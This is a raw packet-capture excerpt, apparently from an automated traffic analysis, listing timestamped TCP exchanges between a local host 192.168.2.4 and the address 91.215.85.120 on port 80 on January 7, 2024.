                                                                                                                                                                    Jan 7, 2024 05:29:31.011888981 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.011939049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.011977911 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.012021065 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.012181044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.012239933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.012288094 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.012315989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.012388945 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.012430906 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.012460947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.012542009 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.012550116 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.078182936 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.078233004 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.078294039 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.078927040 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.078946114 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.078996897 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.079082012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.079121113 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.079158068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.188997030 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.189052105 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.189125061 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.191416025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.191499949 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.191540003 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.191649914 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.191689014 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.191719055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.191863060 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.191905022 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.191932917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.192001104 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.192054033 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.192087889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.192317009 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.192361116 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.192392111 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.192744017 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.192786932 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.192801952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.193849087 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.193885088 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.193918943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.194006920 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.194170952 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.194180012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.194483995 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.194533110 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.194561005 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.194705963 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.194755077 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.194772005 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.194853067 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.194895029 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.194924116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.195118904 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.195167065 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.195204973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.195339918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.195391893 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.195434093 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.195503950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.195540905 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.195597887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.195792913 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.195831060 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.195898056 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.195986032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.196029902 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.196185112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.196305037 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.196352005 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.196409941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.196515083 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.196556091 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.196598053 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.196773052 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.196873903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.196907997 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.197119951 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.197170973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.197189093 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.197232962 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.197248936 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.197300911 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.197304964 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.197350979 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.197423935 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.197527885 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.197571039 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.197588921 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.197729111 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.197767973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.197829008 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.198117018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.198157072 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.198208094 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.198318958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.198374033 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.198903084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.199023962 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.199064970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.199093103 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.199163914 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.199243069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.199260950 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.199439049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.199594975 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.199619055 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.200211048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.200227976 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.200244904 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.200263977 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.200295925 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.200412989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.200593948 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.200666904 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.200695038 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.200774908 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.200812101 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.200860977 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.200964928 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.201006889 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.201854944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.201946974 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.202034950 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.203054905 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.203147888 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.203200102 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.203334093 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.203421116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.203464985 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.203526020 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.203613043 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.203681946 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.204912901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.204997063 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.205089092 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.205116987 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.205331087 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.205373049 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.205424070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.205495119 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.205585957 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.205605030 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.205652952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.205759048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.205804110 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.205826998 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.205885887 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.205902100 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.205971956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.205997944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.206012964 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.206084013 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.206165075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.206206083 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.206226110 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.206264019 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.206393003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.206491947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.206563950 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.206574917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.206638098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.206676960 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.206785917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.206854105 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.206895113 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.206912041 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.207021952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.207063913 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.207153082 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.207376957 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.207418919 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.207446098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.207552910 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.207593918 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.207637072 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.207782984 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.207847118 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.273269892 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.273411989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.273511887 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.273901939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.274058104 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.274136066 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.274219036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.274300098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.274352074 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.384521961 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.384583950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.384656906 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.386905909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.387006998 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.387053967 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.387072086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.387188911 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.387231112 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.387304068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.387438059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.387516975 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.387571096 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.387620926 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.387712955 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.387790918 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.387794018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.387893915 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.388011932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.388075113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.388159037 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.389146090 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.389244080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.389362097 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.389395952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.389457941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.389508009 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.389808893 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.390100956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.390153885 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.390161991 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.390211105 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.390377998 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.390446901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.390574932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.390635014 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.390666962 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.391103029 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.391158104 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.391261101 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.391293049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.391347885 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.391383886 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.391475916 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.391524076 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.391531944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.391606092 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.391674995 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.391716957 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.391724110 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.391767979 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.391877890 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.392584085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.392642021 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.392661095 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.392878056 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.392919064 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.392972946 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.393429995 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.393484116 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.393579006 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.393646002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.393685102 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.393706083 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.393764019 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.393811941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.393824100 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.394392967 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.394452095 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.394490004 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.394531012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.394572973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.394615889 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.394812107 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.394854069 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.394870996 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.395042896 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.395082951 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.395096064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.395128012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.395179987 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.395191908 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.395422935 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.395462990 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.395499945 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.395559072 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.395596027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.395637989 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.395668030 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.395776033 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.396136045 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.396431923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.396466017 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.396476030 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.396538019 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.396609068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.396651983 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.396678925 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.396723986 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.396748066 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.396812916 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.396851063 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.396867990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.396892071 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.396939039 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:31.396975994 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.397144079 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:31.397157907 CET804973591.215.85.120192.168.2.4
